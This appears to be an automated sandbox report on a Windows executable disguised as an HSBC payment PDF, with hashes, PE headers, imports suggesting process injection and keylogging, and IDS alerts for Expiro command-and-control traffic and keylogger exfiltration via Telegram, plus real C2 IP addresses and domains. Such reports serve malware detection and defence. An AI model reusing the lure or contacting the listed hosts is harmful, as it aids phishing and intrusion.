                                                                                                                                                                              SHA-512:409E49C1595F55D0C6A162CDA3713C4BD607731CB1CE7721FFEE30CA8ADB6E5BAADE028935755143CEC573AC992683111655D1130CE202995DED64864274D864
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....h...h.......................................h...!...........................t...p.....Q.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............G..V.K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.t...p.....Q.............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):0.09885495711347125
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:ugK81K3Nk/uMclF6vMclFq5zzT1p6wNIn+SkUeYDwDzyJ81zr:ud0K9kqF69Fq5zzRVI+pawHyJ03
                                                                                                                                                                              MD5:31039D81EEE7ABD40E7D0815A1CB8CCF
                                                                                                                                                                              SHA1:C3C928989DF47C6408B32FF64D774D0855588D98
                                                                                                                                                                              SHA-256:FA5F9151EA53116C17E908D558E907A41EF4B7A25F6146FB67E36C1F94CA889F
                                                                                                                                                                              SHA-512:73DA46DB62282C02CA026C56577470801CD7BB83D0CDDB6EEB21E5A9F4B6B6BAA3A3A89D46F28ACD33F96724D78A2D13FF1E75D4A7E3C82F6A16006B0B5342C1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....X...X.......................................X...!...........................t...p.....P.....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............e*.V.K..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.t...p.....P.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.412345114073512
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File size:1'587'200 bytes
                                                                                                                                                                              MD5:4bd5ab8c1d6eb0d7b601863a74471cf3
                                                                                                                                                                              SHA1:660bd416b9570b16fa77e2e559989f8efb9fd8b4
                                                                                                                                                                              SHA256:0b3ad575168e0457905f19bb5304a8ea8cce461d7b1ebd0964d1171374271e47
                                                                                                                                                                              SHA512:783e5707028cc8acfc022cf4ee50b81689b330faf3cc6312f91d699be4574f389938b60e171849c93e64f86ce7842e13f5665ae9f6f2435e49e8c04a964380bf
                                                                                                                                                                              SSDEEP:49152:IW0c++OCvkGs9FaYwUPYyLNiXicJFFRGNzj3:jB3vkJ9TPj7wRGpj3
                                                                                                                                                                              TLSH:D775D02263DDC360CB769133BF69B7016EBF3C654630B85B2F981D7DA960162162C7A3
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:aaf3e3e3938382a0

                                                                                                                                                                              Static PE Info

                                                                                                                                                                              General

                                                                                                                                                                              Entrypoint:0x427dcd
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x67593553 [Wed Dec 11 06:46:43 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                              File Version Major:5
                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                              Instruction
                                                                                                                                                                              call 00007F3A50C40B4Ah
                                                                                                                                                                              jmp 00007F3A50C33914h
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              int3
                                                                                                                                                                              push edi
                                                                                                                                                                              push esi
                                                                                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                              mov edx, ecx
                                                                                                                                                                              add eax, esi
                                                                                                                                                                              cmp edi, esi
                                                                                                                                                                              jbe 00007F3A50C33A9Ah
                                                                                                                                                                              cmp edi, eax
                                                                                                                                                                              jc 00007F3A50C33DFEh
                                                                                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                                                                                              jnc 00007F3A50C33A99h
                                                                                                                                                                              rep movsb
                                                                                                                                                                              jmp 00007F3A50C33DACh
                                                                                                                                                                              cmp ecx, 00000080h
                                                                                                                                                                              jc 00007F3A50C33C64h
                                                                                                                                                                              mov eax, edi
                                                                                                                                                                              xor eax, esi
                                                                                                                                                                              test eax, 0000000Fh
                                                                                                                                                                              jne 00007F3A50C33AA0h
                                                                                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                                                                                              jc 00007F3A50C33F70h
                                                                                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                                              jnc 00007F3A50C33C3Dh
                                                                                                                                                                              test edi, 00000003h
                                                                                                                                                                              jne 00007F3A50C33C4Eh
                                                                                                                                                                              test esi, 00000003h
                                                                                                                                                                              jne 00007F3A50C33C2Dh
                                                                                                                                                                              bt edi, 02h
                                                                                                                                                                              jnc 00007F3A50C33A9Fh
                                                                                                                                                                              mov eax, dword ptr [esi]
                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                                                                                              mov dword ptr [edi], eax
                                                                                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                                                                                              bt edi, 03h
                                                                                                                                                                              jnc 00007F3A50C33AA3h
                                                                                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                                                                                              sub ecx, 08h
                                                                                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                                                                                              movq qword ptr [edi], xmm1
                                                                                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                                                                                              test esi, 00000007h
                                                                                                                                                                              je 00007F3A50C33AF5h
                                                                                                                                                                              bt esi, 03h
                                                                                                                                                                              jnc 00007F3A50C33B48h

                                                                                                                                                                              Rich Headers

                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [ASM] VS2013 build 21005
                                                                                                                                                                              • [ C ] VS2013 build 21005
                                                                                                                                                                              • [C++] VS2013 build 21005
                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                                                                                              • [RES] VS2013 build 21005
                                                                                                                                                                              • [LNK] VS2013 UPD4 build 31101

                                                                                                                                                                              Data Directories

                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x2d074.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                              Sections

                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x10000x8dcc40x8de008981ff34fb52b0989d43166b389e1422False0.5728679102422908data6.676128389733014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc0xc70000x2d0740x2d200a5c06b4e48eba7577f3c41a22a33014cFalse0.8532667503462604data7.702124355387422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0xf50000x960000x950007f91542c3397ea3ef75e8dc7a4615685False0.9705425492869127data7.92048352815656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                              Resources

                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                              RT_RCDATA0xcf7b80x24339data1.0003776613322004
                                                                                                                                                                              RT_GROUP_ICON0xf3af40x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                              RT_GROUP_ICON0xf3b6c0x14dataEnglishGreat Britain1.25
                                                                                                                                                                              RT_GROUP_ICON0xf3b800x14dataEnglishGreat Britain1.15
                                                                                                                                                                              RT_GROUP_ICON0xf3b940x14dataEnglishGreat Britain1.25
                                                                                                                                                                              RT_VERSION0xf3ba80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                              RT_MANIFEST0xf3c840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                                                                              Imports

                                                                                                                                                                              DLLImport
                                                                                                                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                              UxTheme.dllIsThemeActive
                                                                                                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                                                                              Possible Origin

                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                              EnglishGreat Britain

                                                                                                                                                                              Network Behavior

                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-12-11T09:26:11.604324+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549706TCP
                                                                                                                                                                              2024-12-11T09:26:11.604324+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549706TCP
                                                                                                                                                                              2024-12-11T09:26:12.597628+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970718.141.10.10780TCP
                                                                                                                                                                              2024-12-11T09:26:13.665364+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549708TCP
                                                                                                                                                                              2024-12-11T09:26:13.665364+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549708TCP
                                                                                                                                                                              2024-12-11T09:26:14.947022+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549709193.122.6.16880TCP
                                                                                                                                                                              2024-12-11T09:26:15.356321+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5581301.1.1.153UDP
                                                                                                                                                                              2024-12-11T09:26:15.459262+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.549710TCP
                                                                                                                                                                              2024-12-11T09:26:15.459262+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.549710TCP
                                                                                                                                                                              2024-12-11T09:26:22.321994+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549709193.122.6.16880TCP
                                                                                                                                                                              2024-12-11T09:26:24.482915+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549716149.154.167.220443TCP
                                                                                                                                                                              2024-12-11T09:26:25.356895+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5631161.1.1.153UDP
                                                                                                                                                                              2024-12-11T09:27:14.774279+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54979282.112.184.19780TCP
                                                                                                                                                                              2024-12-11T09:28:02.892689+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.549946TCP
                                                                                                                                                                              2024-12-11T09:28:02.892689+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.549946TCP
                                                                                                                                                                              2024-12-11T09:28:06.685072+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.549952TCP
                                                                                                                                                                              2024-12-11T09:28:06.685072+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.549952TCP

                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                              TCP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 11, 2024 09:26:07.283063889 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:07.404603004 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:07.408528090 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:07.415178061 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:07.536700010 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:07.536837101 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.286230087 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.408804893 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.408904076 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.414887905 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.414907932 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.535690069 CET804970554.244.188.177192.168.2.5
